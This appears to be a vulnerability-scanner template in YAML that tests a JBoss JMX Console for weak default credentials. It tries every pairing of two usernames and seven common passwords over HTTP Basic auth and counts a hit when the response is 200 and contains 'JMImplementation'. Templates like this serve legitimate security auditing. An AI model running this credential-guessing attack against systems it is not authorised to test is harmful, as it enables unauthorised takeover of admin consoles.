id: jmx-default-login
info:
  name: JBoss JMX Console Weak Credential
  author: paradessia
  severity: high
  tags: jboss,jmx,default-login
requests:
  - raw:
      - |
        GET /jmx-console/ HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(user + ':' + pass)}}
    attack: clusterbomb
    payloads:
      user:
        - admin
        - root
      pass:
        - admin
        - 12345
        - 123456
        - 1234
        - 123456789
        - 123qwe
        - root
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - 'JMImplementation'
